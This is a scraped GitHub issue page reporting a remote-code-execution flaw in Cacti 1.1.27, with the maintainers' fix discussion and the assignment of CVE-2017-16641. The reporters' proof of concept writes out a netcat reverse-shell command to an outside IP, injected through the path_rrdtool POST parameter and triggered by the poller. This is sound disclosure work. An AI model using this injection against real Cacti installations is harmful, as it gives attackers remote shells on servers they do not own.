-
-
Notifications
You must be signed in to change notification settings - Fork 399
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Critical vuln in cacti 1.1.27 #1057
Comments
|
We will address this using two techniques. The first will be to conduct validation on the two form types: dirpath, and filepath. If, for these two form types, either the directory does not exist, or the file does not exist, the save will be rejected. Then, as you mentioned, in the case where for some reason a Cacti admin has intentionally added a back door, or some SQL injection has allowed this modification, we will pre-check the path as you described. |
- Potential vulnerability in RRDtool functions - Adding validation to both dirpath and filepath, also verification of executable status to files in RRDtool function. - Spurious htmlspecialchars() to html_escape() calls - Minor SQL formatting for readability
|
Resolved, and thanks for reporting! We really appreciate those who comb the Cacti code for potential exploits. |
|
Thanks for answer, but we think thats need to enumerate of CVE |
|
Is there a open CVE for this issue? If not, please submit your findings and get us a CVE. |
|
We didn't open CVE for this issue. We will send shortly |
|
Use CVE-2017-16641 |
|
@ronytomen now it can be closed |
We (worlak2 and cibvetr2) found RCE vuln with black-box fuzzing.


PoC
1)Send in POST parameter path_rrdtool -> nc -e /bin/bash 192.168.1.214 1337 #
2) Ater 2-5 minutes we have backconnect shell
It’s triggered after execute poller.php in process. We think that because $command not filtered in ./lib/rrd.php:39-40
With regards worlak2 and cibvetr2
The text was updated successfully, but these errors were encountered: